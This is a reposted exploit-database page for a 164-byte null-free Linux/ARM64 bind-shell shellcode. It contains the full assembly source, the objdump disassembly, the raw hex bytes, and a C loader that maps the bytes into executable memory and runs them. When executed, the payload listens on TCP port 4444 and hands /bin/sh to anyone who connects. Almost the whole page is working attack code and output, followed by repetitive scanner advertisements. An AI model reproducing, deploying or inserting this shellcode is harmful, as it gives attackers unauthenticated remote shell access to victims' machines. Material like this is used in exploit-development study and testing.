linuxarm64 bind (4444tcp) shell (binsh) + nullfree shellcode (164 bytes)

▸▸▸ Exploit & Vulnerability >>   shellcode exploit & arm vulnerability




linuxarm64 bind (4444tcp) shell (binsh) + nullfree shellcode (164 bytes) Code Code...
				
/* # Title: Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes) # Date: 2019-06-30 # Tested: Ubuntu 16.04 (aarch64) # Author: Ken Kitahara # Compilation: gcc -o loader loader.c ubuntu@ubuntu:~/works$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus (development branch) Release: 16.04 Codename: xenial ubuntu@ubuntu:~/works$ uname -a Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux ubuntu@ubuntu:~/works$ cat bindshell.s .section .text .global _start _start: // s = socket(2, 1, 0) mov x8, #198 lsr x1, x8, #7 lsl x0, x1, #1 mov x2, xzr svc #0x1337 // save s mvn x4, x0 // bind(s, &sockaddr, 16) lsl x1, x1, #1 movk x1, #0x5C11, lsl #16 str x1, [sp, #-8]! add x1, sp, x2 mov x2, #16 mov x8, #200 svc #0x1337 // listen(s, 2) mvn x0, x4 lsr x1, x2, #3 mov x8, #201 svc #0x1337 mov x5, x1 // a = accept(s, 0, 0) mvn x0, x4 mov x1, xzr mov x2, xzr mov x8, #202 svc #0x1337 // save a mvn x4, x0 lsl x1, x5, #1 dup3: // dup3(s, 2, 0) // dup3(s, 1, 0) // dup3(s, 0, 0) mvn x0, x4 lsr x1, x1, #1 mov x2, xzr mov x8, #24 svc #0x1337 mov x10, xzr cmp x10, x1 bne dup3 // execve("/bin/sh", 0, 0) mov x3, #0x622F movk x3, #0x6E69, lsl #16 movk x3, #0x732F, lsl #32 movk x3, #0x68, lsl #48 str x3, [sp, #-8]! add x0, sp, x1 mov x8, #221 svc #0x1337 ubuntu@ubuntu:~/works$ as -o bindshell.o bindshell.s && ld -o bindshell bindshell.o ubuntu@ubuntu:~/works$ objdump -d ./bindshell ./bindshell: file format elf64-littleaarch64 Disassembly of section .text: 0000000000400078 <_start>: 400078: d28018c8 mov x8, #0xc6 // #198 40007c: d347fd01 lsr x1, x8, #7 400080: d37ff820 lsl x0, x1, #1 400084: aa1f03e2 mov x2, xzr 400088: d40266e1 svc #0x1337 40008c: aa2003e4 mvn x4, x0 400090: d37ff821 lsl x1, x1, #1 400094: f2ab8221 movk x1, #0x5c11, lsl #16 400098: f81f8fe1 str x1, [sp,#-8]! 40009c: 8b2263e1 add x1, sp, x2 4000a0: d2800202 mov x2, #0x10 // #16 4000a4: d2801908 mov x8, #0xc8 // #200 4000a8: d40266e1 svc #0x1337 4000ac: aa2403e0 mvn x0, x4 4000b0: d343fc41 lsr x1, x2, #3 4000b4: d2801928 mov x8, #0xc9 // #201 4000b8: d40266e1 svc #0x1337 4000bc: aa0103e5 mov x5, x1 4000c0: aa2403e0 mvn x0, x4 4000c4: aa1f03e1 mov x1, xzr 4000c8: aa1f03e2 mov x2, xzr 4000cc: d2801948 mov x8, #0xca // #202 4000d0: d40266e1 svc #0x1337 4000d4: aa2003e4 mvn x4, x0 4000d8: d37ff8a1 lsl x1, x5, #1 00000000004000dc <dup3>: 4000dc: aa2403e0 mvn x0, x4 4000e0: d341fc21 lsr x1, x1, #1 4000e4: aa1f03e2 mov x2, xzr 4000e8: d2800308 mov x8, #0x18 // #24 4000ec: d40266e1 svc #0x1337 4000f0: aa1f03ea mov x10, xzr 4000f4: eb01015f cmp x10, x1 4000f8: 54ffff21 b.ne 4000dc <dup3> 4000fc: d28c45e3 mov x3, #0x622f // #25135 400100: f2adcd23 movk x3, #0x6e69, lsl #16 400104: f2ce65e3 movk x3, #0x732f, lsl #32 400108: f2e00d03 movk x3, #0x68, lsl #48 40010c: f81f8fe3 str x3, [sp,#-8]! 400110: 8b2163e0 add x0, sp, x1 400114: d2801ba8 mov x8, #0xdd // #221 400118: d40266e1 svc #0x1337 ubuntu@ubuntu:~/works$ objcopy -O binary bindshell bindshell.bin ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell.bin && echo \xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4 */ #include <stdio.h> #include <sys/mman.h> #include <string.h> #include <stdlib.h> int (*sc)(); char shellcode[] = "\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa" "\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2" "\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x08\x19\x80\xd2" "\xe1\x66\x02\xd4\xe0\x03\x24\xaa\x41\xfc\x43\xd3\x28\x19\x80\xd2" "\xe1\x66\x02\xd4\xe5\x03\x01\xaa\xe0\x03\x24\xaa\xe1\x03\x1f\xaa" "\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa" "\xa1\xf8\x7f\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa" "\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb" "\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2" "\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2" "\xe1\x66\x02\xd4"; int main(int argc, char **argv) { printf("Shellcode Length: %zd Bytes\n", strlen(shellcode)); void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } memcpy(ptr, shellcode, sizeof(shellcode)); sc = ptr; sc(); return 0; }

Linuxarm64 bind (4444tcp) shell (binsh) + nullfree shellcode (164 bytes) Vulnerability / Exploit Source : Linuxarm64 bind (4444tcp) shell (binsh) + nullfree shellcode (164 bytes)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.